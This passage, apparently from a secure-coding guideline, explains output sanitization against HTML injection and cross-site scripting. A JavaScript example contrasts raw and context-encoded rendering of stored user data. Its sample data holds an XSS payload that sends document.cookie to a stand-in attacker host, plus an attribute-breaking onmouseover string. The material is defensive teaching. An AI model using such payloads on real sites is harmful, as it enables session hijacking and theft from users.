...

Several subsystems exist to display output; the HTML renderer in a web browser is one common example. Data sent to an output subsystem may appear to originate from a trusted source, so it is tempting to assume that output sanitization is unnecessary. However, that data may indirectly originate from an untrusted source (for example, user-supplied input that was stored in a database and later read back for display) and may include malicious content. Failure to properly sanitize data for an output subsystem can enable several types of attack. For example, HTML renderers are prone to HTML injection and cross-site scripting (XSS) [OWASP 2011] attacks. (Note that the term cross-site scripting is generally applied to such attacks even when only one site is involved.) Output sanitization to prevent such attacks is as vital as input sanitization.
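The following JavaScript is an added example, not code from the original page: it shows the situation described above, where a value read from the application's own storage looks trusted but was originally supplied by a user, and contrasts rendering it raw with encoding it for the HTML context it lands in. The record, the helper names (escapeHtml, safeHref, renderProfileUnsafe, renderProfileSafe, containsActiveContent) and the attack strings are all constructed for illustration.

```javascript
// Added example (not from the original page): output encoding before handing
// data to an HTML renderer. All names and sample data below are hypothetical.

// Encode for HTML element content and double-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[ch]);
}

// HTML-encoding alone does not neutralize a javascript: URL in an href, so the
// URL context needs its own check: require an absolute http(s) URL, then encode.
function safeHref(s) {
  try {
    const u = new URL(String(s));           // throws on relative or malformed input
    if (u.protocol !== "http:" && u.protocol !== "https:") return "#";
    return escapeHtml(u.href);              // still encode for the attribute context
  } catch {
    return "#";
  }
}

// Constructed "stored" record: it appears to come from our own database (a
// trusted source) but the values were originally entered by a user.
const storedProfile = {
  displayName: 'Mallory<script>document.location="https://attacker.example/?c="+document.cookie</script>',
  website: '" onmouseover="alert(1)',
};

// Vulnerable: trusts the database and interpolates the raw values.
function renderProfileUnsafe(p) {
  return `<p>Name: ${p.displayName}</p>` +
         `<a href="${p.website}">site</a>`;
}

// Hardened: every dynamic value is encoded for the context it is placed in.
function renderProfileSafe(p) {
  return `<p>Name: ${escapeHtml(p.displayName)}</p>` +
         `<a href="${safeHref(p.website)}">site</a>`;
}

// Crude detector used only to demonstrate the difference: does the rendered
// markup contain a script element or an injected event-handler attribute?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /"\s+on\w+=/i.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", renderProfileUnsafe(storedProfile));
  console.log("safe:  ", renderProfileSafe(storedProfile));
}
```

Note that the encoding is chosen per context: the same value needs a different treatment as element text, as an attribute value, as a URL, or inside a script block, which is why a single global "sanitize on input" pass cannot replace encoding at the point of output.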

...